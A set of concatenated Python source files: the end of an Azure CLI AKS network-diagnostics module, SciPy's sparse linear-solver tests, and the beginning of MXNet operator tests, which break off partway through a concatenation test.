network_status_array += format_diag_status(network_status_object)
ready_nodes[node_name] = True
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
print()
if network_config_array:
print("Below are the network configuration for each node: ")
print()
print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
print()
else:
logger.warning("Could not get network config. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
if network_status_array:
print("Below are the network connectivity results for each node:")
print()
print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
else:
logger.warning("Could not get networking status. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
for diag in diag_status:
if diag["Status"]:
if "Error:" in diag["Status"]:
diag["Status"] = f'{colorama.Fore.RED}{diag["Status"]}{colorama.Style.RESET_ALL}'
else:
diag["Status"] = f'{colorama.Fore.GREEN}{diag["Status"]}{colorama.Style.RESET_ALL}'
return diag_status
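# Illustrative input/output for format_diag_status (a sketch; the field name follows
# the usage above): an entry such as {"Status": "Error: dns lookup failed"} has its
# status re-rendered in red, while any other non-empty status is rendered in green.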
def format_bright(msg):
return f'\033[1m{colorama.Style.BRIGHT}{msg}{colorama.Style.RESET_ALL}'
def format_hyperlink(the_link):
return f'\033[1m{colorama.Style.BRIGHT}{colorama.Fore.BLUE}{the_link}{colorama.Style.RESET_ALL}'
|
test_linsolve.py
|
from __future__ import division, print_function, absolute_import
import threading
import numpy as np
from numpy import array, finfo, arange, eye, all, unique, ones, dot, matrix
import numpy.random as random
from numpy.testing import (
assert_array_almost_equal, assert_raises, assert_almost_equal,
assert_equal, assert_array_equal, assert_, assert_allclose,
assert_warns)
import pytest
from scipy._lib._numpy_compat import assert_raises_regex
import scipy.linalg
from scipy.linalg import norm, inv
from scipy.sparse import (spdiags, SparseEfficiencyWarning, csc_matrix,
csr_matrix, identity, isspmatrix, dok_matrix, lil_matrix, bsr_matrix)
from scipy.sparse.linalg import SuperLU
from scipy.sparse.linalg.dsolve import (spsolve, use_solver, splu, spilu,
MatrixRankWarning, _superlu, spsolve_triangular, factorized)
from scipy._lib._numpy_compat import suppress_warnings
sup_sparse_efficiency = suppress_warnings()
sup_sparse_efficiency.filter(SparseEfficiencyWarning)
# scikits.umfpack is not a SciPy dependency but it is optionally used in
# dsolve, so check whether it's available
try:
import scikits.umfpack as umfpack
has_umfpack = True
except ImportError:
has_umfpack = False
def toarray(a):
if isspmatrix(a):
return a.toarray()
else:
return a
class TestFactorized(object):
def setup_method(self):
n = 5
d = arange(n) + 1
self.n = n
self.A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), n, n).tocsc()
random.seed(1234)
def _check_singular(self):
A = csc_matrix((5,5), dtype='d')
b = ones(5)
assert_array_almost_equal(0. * b, factorized(A)(b))
def _check_non_singular(self):
# Make the matrix diagonally dominant to make sure it is not singular
n = 5
a = csc_matrix(random.rand(n, n))
b = ones(n)
expected = splu(a).solve(b)
assert_array_almost_equal(factorized(a)(b), expected)
def test_singular_without_umfpack(self):
use_solver(useUmfpack=False)
assert_raises_regex(RuntimeError, "Factor is exactly singular", self._check_singular)
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_singular_with_umfpack(self):
use_solver(useUmfpack=True)
with suppress_warnings() as sup:
sup.filter(RuntimeWarning, "divide by zero encountered in double_scalars")
assert_warns(umfpack.UmfpackWarning, self._check_singular)
def test_non_singular_without_umfpack(self):
use_solver(useUmfpack=False)
self._check_non_singular()
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_non_singular_with_umfpack(self):
use_solver(useUmfpack=True)
self._check_non_singular()
def test_cannot_factorize_nonsquare_matrix_without_umfpack(self):
use_solver(useUmfpack=False)
assert_raises_regex(ValueError, "can only factor square matrices",
factorized, self.A[:,:4])
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_factorizes_nonsquare_matrix_with_umfpack(self):
use_solver(useUmfpack=True)
# does not raise
factorized(self.A[:,:4])
def test_call_with_incorrectly_sized_matrix_without_umfpack(self):
use_solver(useUmfpack=False)
solve = factorized(self.A)
b = random.rand(4)
B = random.rand(4, 3)
BB = random.rand(self.n, 3, 9)
assert_raises_regex(ValueError, "is of incompatible size", solve, b)
assert_raises_regex(ValueError, "is of incompatible size", solve, B)
assert_raises_regex(ValueError, "object too deep for desired array", solve, BB)
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_call_with_incorrectly_sized_matrix_with_umfpack(self):
use_solver(useUmfpack=True)
solve = factorized(self.A)
b = random.rand(4)
B = random.rand(4, 3)
BB = random.rand(self.n, 3, 9)
# does not raise
solve(b)
assert_raises_regex(ValueError, "object too deep for desired array", solve, B)
assert_raises_regex(ValueError, "object too deep for desired array", solve, BB)
def test_call_with_cast_to_complex_without_umfpack(self):
use_solver(useUmfpack=False)
solve = factorized(self.A)
b = random.rand(4)
for t in [np.complex64, np.complex128]:
assert_raises_regex(TypeError, "Cannot cast array data", solve,
b.astype(t))
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_call_with_cast_to_complex_with_umfpack(self):
use_solver(useUmfpack=True)
solve = factorized(self.A)
b = random.rand(4)
for t in [np.complex64, np.complex128]:
assert_warns(np.ComplexWarning, solve, b.astype(t))
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_assume_sorted_indices_flag(self):
# a sparse matrix with unsorted indices
unsorted_inds = np.array([2, 0, 1, 0])
data = np.array([10, 16, 5, 0.4])
indptr = np.array([0, 1, 2, 4])
A = csc_matrix((data, unsorted_inds, indptr), (3, 3))
b = ones(3)
# should raise when incorrectly assuming indices are sorted
use_solver(useUmfpack=True, assumeSortedIndices=True)
assert_raises_regex(RuntimeError, "UMFPACK_ERROR_invalid_matrix", factorized, A)
# should sort indices and succeed when not assuming indices are sorted
use_solver(useUmfpack=True, assumeSortedIndices=False)
expected = splu(A.copy()).solve(b)
assert_equal(A.has_sorted_indices, 0)
assert_array_almost_equal(factorized(A)(b), expected)
assert_equal(A.has_sorted_indices, 1)
class TestLinsolve(object):
def setup_method(self):
use_solver(useUmfpack=False)
def test_singular(self):
A = csc_matrix((5,5), dtype='d')
b = array([1, 2, 3, 4, 5],dtype='d')
with suppress_warnings() as sup:
sup.filter(MatrixRankWarning, "Matrix is exactly singular")
x = spsolve(A, b)
assert_(not np.isfinite(x).any())
def test_singular_gh_3312(self):
# "Bad" test case that leads SuperLU to call LAPACK with invalid
# arguments. Check that it fails moderately gracefully.
ij = np.array([(17, 0), (17, 6), (17, 12), (10, 13)], dtype=np.int32)
v = np.array([0.284213, 0.94933781, 0.15767017, 0.38797296])
A = csc_matrix((v, ij.T), shape=(20, 20))
b = np.arange(20)
try:
# should either raise a RuntimeError or return a value
# appropriate for singular input
x = spsolve(A, b)
assert_(not np.isfinite(x).any())
except RuntimeError:
pass
def test_twodiags(self):
A = spdiags([[1, 2, 3, 4, 5], [6, 5, 8, 9, 10]], [0, 1], 5, 5)
b = array([1, 2, 3, 4, 5])
# condition number of A
cond_A = norm(A.todense(),2) * norm(inv(A.todense()),2)
for t in ['f','d','F','D']:
eps = finfo(t).eps # floating point epsilon
b = b.astype(t)
for format in ['csc','csr']:
Asp = A.astype(t).asformat(format)
x = spsolve(Asp,b)
assert_(norm(b - Asp*x) < 10 * cond_A * eps)
def test_bvector_smoketest(self):
Adense = matrix([[0., 1., 1.],
[1., 0., 1.],
[0., 0., 1.]])
As = csc_matrix(Adense)
random.seed(1234)
x = random.randn(3)
b = As*x
x2 = spsolve(As, b)
assert_array_almost_equal(x, x2)
def test_bmatrix_smoketest(self):
Adense = matrix([[0., 1., 1.],
[1., 0., 1.],
[0., 0., 1.]])
As = csc_matrix(Adense)
random.seed(1234)
x = random.randn(3, 4)
Bdense = As.dot(x)
Bs = csc_matrix(Bdense)
x2 = spsolve(As, Bs)
assert_array_almost_equal(x, x2.todense())
@sup_sparse_efficiency
def test_non_square(self):
# A is not square.
A = ones((3, 4))
b = ones((4, 1))
assert_raises(ValueError, spsolve, A, b)
# A2 and b2 have incompatible shapes.
A2 = csc_matrix(eye(3))
b2 = array([1.0, 2.0])
assert_raises(ValueError, spsolve, A2, b2)
@sup_sparse_efficiency
def test_example_comparison(self):
row = array([0,0,1,2,2,2])
col = array([0,2,2,0,1,2])
data = array([1,2,3,-4,5,6])
sM = csr_matrix((data,(row,col)), shape=(3,3), dtype=float)
M = sM.todense()
row = array([0,0,1,1,0,0])
col = array([0,2,1,1,0,0])
data = array([1,1,1,1,1,1])
sN = csr_matrix((data, (row,col)), shape=(3,3), dtype=float)
N = sN.todense()
sX = spsolve(sM, sN)
X = scipy.linalg.solve(M, N)
assert_array_almost_equal(X, sX.todense())
@sup_sparse_efficiency
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_shape_compatibility(self):
use_solver(useUmfpack=True)
A = csc_matrix([[1., 0], [0, 2]])
bs = [
[1, 6],
array([1, 6]),
[[1], [6]],
array([[1], [6]]),
csc_matrix([[1], [6]]),
csr_matrix([[1], [6]]),
dok_matrix([[1], [6]]),
bsr_matrix([[1], [6]]),
array([[1., 2., 3.], [6., 8., 10.]]),
csc_matrix([[1., 2., 3.], [6., 8., 10.]]),
csr_matrix([[1., 2., 3.], [6., 8., 10.]]),
dok_matrix([[1., 2., 3.], [6., 8., 10.]]),
bsr_matrix([[1., 2., 3.], [6., 8., 10.]]),
]
for b in bs:
x = np.linalg.solve(A.toarray(), toarray(b))
for spmattype in [csc_matrix, csr_matrix, dok_matrix, lil_matrix]:
x1 = spsolve(spmattype(A), b, use_umfpack=True)
x2 = spsolve(spmattype(A), b, use_umfpack=False)
# check solution
if x.ndim == 2 and x.shape[1] == 1:
# spsolve also interprets these as "vectors"
x = x.ravel()
assert_array_almost_equal(toarray(x1), x, err_msg=repr((b, spmattype, 1)))
assert_array_almost_equal(toarray(x2), x, err_msg=repr((b, spmattype, 2)))
# dense vs. sparse output ("vectors" are always dense)
if isspmatrix(b) and x.ndim > 1:
assert_(isspmatrix(x1), repr((b, spmattype, 1)))
assert_(isspmatrix(x2), repr((b, spmattype, 2)))
else:
assert_(isinstance(x1, np.ndarray), repr((b, spmattype, 1)))
assert_(isinstance(x2, np.ndarray), repr((b, spmattype, 2)))
# check output shape
if x.ndim == 1:
# "vector"
assert_equal(x1.shape, (A.shape[1],))
assert_equal(x2.shape, (A.shape[1],))
else:
# "matrix"
assert_equal(x1.shape, x.shape)
assert_equal(x2.shape, x.shape)
A = csc_matrix((3, 3))
b = csc_matrix((1, 3))
assert_raises(ValueError, spsolve, A, b)
@sup_sparse_efficiency
def test_ndarray_support(self):
A = array([[1., 2.], [2., 0.]])
x = array([[1., 1.], [0.5, -0.5]])
b = array([[2., 0.], [2., 2.]])
assert_array_almost_equal(x, spsolve(A, b))
def test_gssv_badinput(self):
N = 10
d = arange(N) + 1.0
A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), N, N)
for spmatrix in (csc_matrix, csr_matrix):
A = spmatrix(A)
b = np.arange(N)
def not_c_contig(x):
return x.repeat(2)[::2]
def not_1dim(x):
return x[:,None]
def bad_type(x):
return x.astype(bool)
def too_short(x):
return x[:-1]
badops = [not_c_contig, not_1dim, bad_type, too_short]
for badop in badops:
msg = "%r %r" % (spmatrix, badop)
# Not C-contiguous
assert_raises((ValueError, TypeError), _superlu.gssv,
N, A.nnz, badop(A.data), A.indices, A.indptr,
b, int(spmatrix == csc_matrix), err_msg=msg)
assert_raises((ValueError, TypeError), _superlu.gssv,
N, A.nnz, A.data, badop(A.indices), A.indptr,
b, int(spmatrix == csc_matrix), err_msg=msg)
assert_raises((ValueError, TypeError), _superlu.gssv,
N, A.nnz, A.data, A.indices, badop(A.indptr),
b, int(spmatrix == csc_matrix), err_msg=msg)
def test_sparsity_preservation(self):
ident = csc_matrix([
[1, 0, 0],
[0, 1, 0],
[0, 0, 1]])
b = csc_matrix([
[0, 1],
[1, 0],
[0, 0]])
x = spsolve(ident, b)
assert_equal(ident.nnz, 3)
assert_equal(b.nnz, 2)
assert_equal(x.nnz, 2)
assert_allclose(x.A, b.A, atol=1e-12, rtol=1e-12)
def test_dtype_cast(self):
A_real = scipy.sparse.csr_matrix([[1, 2, 0],
[0, 0, 3],
[4, 0, 5]])
A_complex = scipy.sparse.csr_matrix([[1, 2, 0],
[0, 0, 3],
[4, 0, 5 + 1j]])
b_real = np.array([1,1,1])
b_complex = np.array([1,1,1]) + 1j*np.array([1,1,1])
x = spsolve(A_real, b_real)
assert_(np.issubdtype(x.dtype, np.floating))
x = spsolve(A_real, b_complex)
assert_(np.issubdtype(x.dtype, np.complexfloating))
x = spsolve(A_complex, b_real)
assert_(np.issubdtype(x.dtype, np.complexfloating))
x = spsolve(A_complex, b_complex)
assert_(np.issubdtype(x.dtype, np.complexfloating))
class TestSplu(object):
def setup_method(self):
use_solver(useUmfpack=False)
n = 40
d = arange(n) + 1
self.n = n
self.A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), n, n)
random.seed(1234)
def _smoketest(self, spxlu, check, dtype):
if np.issubdtype(dtype, np.complexfloating):
A = self.A + 1j*self.A.T
else:
A = self.A
A = A.astype(dtype)
lu = spxlu(A)
rng = random.RandomState(1234)
# Input shapes
for k in [None, 1, 2, self.n, self.n+2]:
msg = "k=%r" % (k,)
if k is None:
b = rng.rand(self.n)
else:
b = rng.rand(self.n, k)
if np.issubdtype(dtype, np.complexfloating):
b = b + 1j*rng.rand(*b.shape)
b = b.astype(dtype)
x = lu.solve(b)
check(A, b, x, msg)
x = lu.solve(b, 'T')
check(A.T, b, x, msg)
x = lu.solve(b, 'H')
check(A.T.conj(), b, x, msg)
@sup_sparse_efficiency
def test_splu_smoketest(self):
self._internal_test_splu_smoketest()
def _internal_test_splu_smoketest(self):
# Check that splu works at all
def check(A, b, x, msg=""):
eps = np.finfo(A.dtype).eps
r = A * x
assert_(abs(r - b).max() < 1e3*eps, msg)
self._smoketest(splu, check, np.float32)
self._smoketest(splu, check, np.float64)
self._smoketest(splu, check, np.complex64)
self._smoketest(splu, check, np.complex128)
@sup_sparse_efficiency
def test_spilu_smoketest(self):
self._internal_test_spilu_smoketest()
def _internal_test_spilu_smoketest(self):
errors = []
def check(A, b, x, msg=""):
r = A * x
err = abs(r - b).max()
assert_(err < 1e-2, msg)
if b.dtype in (np.float64, np.complex128):
errors.append(err)
self._smoketest(spilu, check, np.float32)
self._smoketest(spilu, check, np.float64)
self._smoketest(spilu, check, np.complex64)
self._smoketest(spilu, check, np.complex128)
assert_(max(errors) > 1e-5)
@sup_sparse_efficiency
def test_spilu_drop_rule(self):
# Test passing in the drop_rule argument to spilu.
A = identity(2)
rules = [
b'basic,area'.decode('ascii'), # unicode
b'basic,area', # ascii
[b'basic', b'area'.decode('ascii')]
]
for rule in rules:
# Argument should be accepted
assert_(isinstance(spilu(A, drop_rule=rule), SuperLU))
def test_splu_nnz0(self):
A = csc_matrix((5,5), dtype='d')
assert_raises(RuntimeError, splu, A)
def test_spilu_nnz0(self):
A = csc_matrix((5,5), dtype='d')
assert_raises(RuntimeError, spilu, A)
def test_splu_basic(self):
# Test basic splu functionality.
n = 30
rng = random.RandomState(12)
a = rng.rand(n, n)
a[a < 0.95] = 0
# First test with a singular matrix
a[:, 0] = 0
a_ = csc_matrix(a)
# Matrix is exactly singular
assert_raises(RuntimeError, splu, a_)
# Make the matrix diagonally dominant to make sure it is not singular
a += 4*eye(n)
a_ = csc_matrix(a)
lu = splu(a_)
b = ones(n)
x = lu.solve(b)
assert_almost_equal(dot(a, x), b)
def test_splu_perm(self):
# Test the permutation vectors exposed by splu.
n = 30
a = random.random((n, n))
a[a < 0.95] = 0
# Make the matrix diagonally dominant to make sure it is not singular
a += 4*eye(n)
a_ = csc_matrix(a)
lu = splu(a_)
# Check that the permutation indices do belong to [0, n-1].
for perm in (lu.perm_r, lu.perm_c):
assert_(all(perm > -1))
assert_(all(perm < n))
assert_equal(len(unique(perm)), len(perm))
# Now make the matrix symmetric, and test that the two permutation
# vectors are the same
# Note: a += a.T relies on undefined behavior.
a = a + a.T
a_ = csc_matrix(a)
lu = splu(a_)
assert_array_equal(lu.perm_r, lu.perm_c)
def test_lu_refcount(self):
# Test that we are keeping track of the reference count with splu.
n = 30
a = random.random((n, n))
a[a < 0.95] = 0
# Make the matrix diagonally dominant to make sure it is not singular
a += 4*eye(n)
a_ = csc_matrix(a)
lu = splu(a_)
# And now test that we don't have a refcount bug
import sys
rc = sys.getrefcount(lu)
for attr in ('perm_r', 'perm_c'):
perm = getattr(lu, attr)
assert_equal(sys.getrefcount(lu), rc + 1)
del perm
assert_equal(sys.getrefcount(lu), rc)
def test_bad_inputs(self):
A = self.A.tocsc()
assert_raises(ValueError, splu, A[:,:4])
assert_raises(ValueError, spilu, A[:,:4])
for lu in [splu(A), spilu(A)]:
b = random.rand(42)
B = random.rand(42, 3)
BB = random.rand(self.n, 3, 9)
assert_raises(ValueError, lu.solve, b)
assert_raises(ValueError, lu.solve, B)
assert_raises(ValueError, lu.solve, BB)
assert_raises(TypeError, lu.solve,
b.astype(np.complex64))
assert_raises(TypeError, lu.solve,
b.astype(np.complex128))
@sup_sparse_efficiency
def test_superlu_dlamch_i386_nan(self):
# SuperLU 4.3 calls some functions returning floats without
# declaring them. On i386@linux call convention, this fails to
# clear floating point registers after call. As a result, NaN
# can appear in the next floating point operation made.
#
# Here's a test case that triggered the issue.
n = 8
d = np.arange(n) + 1
A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), n, n)
A = A.astype(np.float32)
spilu(A)
A = A + 1j*A
B = A.A
assert_(not np.isnan(B).any())
@sup_sparse_efficiency
def test_lu_attr(self):
def check(dtype, complex_2=False):
A = self.A.astype(dtype)
if complex_2:
A = A + 1j*A.T
n = A.shape[0]
lu = splu(A)
# Check that the decomposition is as advertized
Pc = np.zeros((n, n))
Pc[np.arange(n), lu.perm_c] = 1
Pr = np.zeros((n, n))
Pr[lu.perm_r, np.arange(n)] = 1
Ad = A.toarray()
lhs = Pr.dot(Ad).dot(Pc)
rhs = (lu.L * lu.U).toarray()
eps = np.finfo(dtype).eps
assert_allclose(lhs, rhs, atol=100*eps)
check(np.float32)
check(np.float64)
check(np.complex64)
check(np.complex128)
check(np.complex64, True)
check(np.complex128, True)
@sup_sparse_efficiency
def test_threads_parallel(self):
oks = []
def worker():
try:
self.test_splu_basic()
self._internal_test_splu_smoketest()
self._internal_test_spilu_smoketest()
oks.append(True)
except Exception:
pass
threads = [threading.Thread(target=worker)
for k in range(20)]
for t in threads:
t.start()
for t in threads:
t.join()
assert_equal(len(oks), 20)
class TestSpsolveTriangular(object):
def setup_method(self):
use_solver(useUmfpack=False)
def test_singular(self):
n = 5
A = csr_matrix((n, n))
b = np.arange(n)
for lower in (True, False):
assert_raises(scipy.linalg.LinAlgError, spsolve_triangular, A, b, lower=lower)
@sup_sparse_efficiency
def test_bad_shape(self):
# A is not square.
A = np.zeros((3, 4))
b = ones((4, 1))
assert_raises(ValueError, spsolve_triangular, A, b)
# A2 and b2 have incompatible shapes.
A2 = csr_matrix(eye(3))
b2 = array([1.0, 2.0])
assert_raises(ValueError, spsolve_triangular, A2, b2)
@sup_sparse_efficiency
def test_input_types(self):
A = array([[1., 0.], [1., 2.]])
b = array([[2., 0.], [2., 2.]])
for matrix_type in (array, csc_matrix, csr_matrix):
x = spsolve_triangular(matrix_type(A), b, lower=True)
assert_array_almost_equal(A.dot(x), b)
@sup_sparse_efficiency
def test_random(self):
def random_triangle_matrix(n, lower=True):
A = scipy.sparse.random(n, n, density=0.1, format='coo')
if lower:
A = scipy.sparse.tril(A)
else:
A = scipy.sparse.triu(A)
A = A.tocsr(copy=False)
for i in range(n):
A[i, i] = np.random.rand() + 1
return A
np.random.seed(1234)
for lower in (True, False):
for n in (10, 10**2, 10**3):
A = random_triangle_matrix(n, lower=lower)
for m in (1, 10):
for b in (np.random.rand(n, m),
np.random.randint(-9, 9, (n, m)),
np.random.randint(-9, 9, (n, m)) +
np.random.randint(-9, 9, (n, m)) * 1j):
x = spsolve_triangular(A, b, lower=lower)
assert_array_almost_equal(A.dot(x), b)
|
test_operator.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
from __future__ import division
import numpy as np
import mxnet as mx
import copy
import math
import random
import itertools
from distutils.version import LooseVersion
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from mxnet.operator import *
from mxnet.base import py_str, MXNetError, _as_list
from common import assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied, assertRaises
from common import xfail_when_nonstandard_decimal_separator, with_environment
import pytest
import os
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_rnn_with_new_param():
rnn_modes = ['rnn_relu', 'rnn_tanh', 'gru', 'lstm']
ngates_ = [1, 1, 3, 4]
num_layers, input_size, seq_len, batch_size, state_size = 3, 128, 5, 64, 8
for bidirectional in [False, True]:
directions = 2 if bidirectional else 1
for mode, ngates in zip(rnn_modes, ngates_):
first_layer_size = (input_size * state_size + state_size * state_size + state_size * 2) * ngates
rest_layer_size = (state_size * directions * state_size + state_size * state_size + state_size * 2) \
* ngates * (num_layers - 1)
param_size = (first_layer_size + rest_layer_size) * directions
sym = mx.sym.RNN(mode=mode, num_layers=num_layers, bidirectional=bidirectional,
state_outputs=False, state_size=state_size, name='rnn')
bind_dict = {
'rnn_data': mx.ndarray.random.uniform(low=-1, high=1, shape=(seq_len, batch_size, input_size)),
'rnn_parameters': mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size)),
'rnn_state': mx.ndarray.zeros(shape=(num_layers * directions, batch_size, state_size))
}
if mode == 'lstm':
bind_dict['rnn_state_cell'] = mx.ndarray.zeros(
shape=(num_layers * directions, batch_size, state_size))
ex = sym._bind(default_context(), bind_dict)
ex.forward(is_train=True)
ex01 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex02 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex01, ex02, rtol=1e-2, atol=1e-4)
bind_dict['rnn_parameters'] = mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size))
ex.copy_params_from(bind_dict)
ex.forward(is_train=True)
ex03 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex04 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex03, ex04, rtol=1e-2, atol=1e-4)
@pytest.mark.serial
def test_lstm_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
CX = mx.sym.Variable('state_cell')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX, state_cell=CX,
state_size=H, num_layers=5, mode='lstm', p=0.5, state_outputs=True, name='LSTM')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_gru_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='gru', p=0.5, state_outputs=True, name='GRU')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_rnntanh_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_tanh', p=0.5, state_outputs=True, name='RNN_TANH')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_rnnrelu_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_relu', p=0.5, state_outputs=True, name='RNN_RELU')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
def test_RNN_float64():
if default_context().device_type == 'gpu':
return
sym = mx.sym.RNN(
mx.sym.Variable('in'),
mx.sym.Variable('par'),
mx.sym.Variable('s'),
state_size = (2),
num_layers = 1,
mode = 'rnn_tanh'
)
dtype = 'float64'
explicit_grad = {
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
}
args_grad = explicit_grad
grad_req = 'write'
ex = sym._bind(default_context(),
{
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
},
args_grad = args_grad,
grad_req = grad_req
)
ex.forward()
ex.outputs[0].wait_to_read()
def np_softmax(x, axis=-1, temperature=1.0):
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x/temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
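# A minimal sanity check for the np_softmax reference helper above (an illustrative
# sketch; the input values are arbitrary): each row sums to one, and a higher
# temperature flattens the distribution.
_softmax_example = np.array([[1.0, 2.0, 3.0]])
assert_allclose(np_softmax(_softmax_example).sum(axis=-1), [1.0], rtol=1e-6)
assert np_softmax(_softmax_example, temperature=100.0).max() < np_softmax(_softmax_example).max()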
def check_elementwise_sum_with_shape(shape, n):
# forward
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.ElementWiseSum(*inputs, name='esum')
arr = [mx.nd.empty(shape) for i in range(n)]
arr_grad = [mx.nd.empty(shape) for i in range(n)]
for i in range(n):
arr[i][:] = np.random.uniform(-10, 10, shape)
exec1 = out._bind(default_context(),
args=arr,
args_grad=arr_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
out = sum(a.asnumpy() for a in arr)
assert_almost_equal(out, out1, rtol=1e-5, atol=1e-5)
out_grad = mx.nd.empty(shape)
out_grad[:] = np.random.uniform(-10, 10, shape)
# backward
exec1.backward([out_grad])
for a in arr_grad:
assert_almost_equal(a, out_grad, rtol=1e-5, atol=1e-5)
@pytest.mark.serial
def test_elementwise_sum():
nrepeat = 2
maxdim = 4
for repeat in range(nrepeat):
for dim in range(1, maxdim):
shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
check_elementwise_sum_with_shape(shape, np.random.randint(1, 8))
def check_concat_with_shape(shapes, dimension, skip_second):
# if skip_second is True, second argument will not have gradient.
# it is to test #1130
n = len(shapes)
# forward
target_dim = 0
for shape in shapes:
target_dim += shape[dimension]
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.Concat(*inputs, name='conc',dim=dimension)
arr = [mx.nd.empty(shape) for shape in shapes]
for i in range(n):
arr[i][:] = shapes[i][dimension]
arr_np = [np.copy(narray.asnumpy()) for narray in arr]
arr_grad = [mx.nd.empty(shape) for shape in shapes]
dict_grad = {}
arg_names = out.list_arguments()
for name, g in zip(arg_names, arr_grad):
if not skip_second or name != 'arg1':
dict_grad[name] = g
args = out.list_arguments()
arg_shapes, out_shapes, aux_shapes = out.infer_shape(**dict(zip(args, shapes)))
out_grad = mx.nd.empty(out_shapes[0])
exec1 = out._bind(default_context(),
args=arr,
args_grad=dict_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
ret = np.concatenate([narray.asnumpy() for narray in arr], axis=dimension)
assert_almost_equal(out1, ret)
# backward
out1.copyto(out_grad)
out_grad[:] += 1
exec1.backward([out_grad])
for i, name in enumerate(arg_names):
if not skip_second or name != 'arg1':
grad = dict_grad[name]
np_grad = arr_np[i]
assert_almost_equal(grad, np_grad + 1)
def test_concat():
for dimension in range(4):
n = 2
merge = [2, 3, 4, 5, 6]
a = 2
b = 3
c = 4
# test 2D
if dimension<2:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a))
elif dimension == 1:
shapes.append((a, merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 2, True)
check_concat_with_shape(shapes, dimension - 2, False)
#test 3D
if dimension<3:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a,b))
elif dimension ==1:
shapes.append((a,merge[i],b))
elif dimension ==2:
shapes.append((a,b,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 3, True)
check_concat_with_shape(shapes, dimension - 3, False)
# test 4D
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i],a,b,c))
elif dimension == 1:
shapes.append((a,merge[i],b,c))
elif dimension ==2:
shapes.append((a,b,merge[i],c))
elif dimension ==3:
shapes.append((a,b,c,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 4, True)
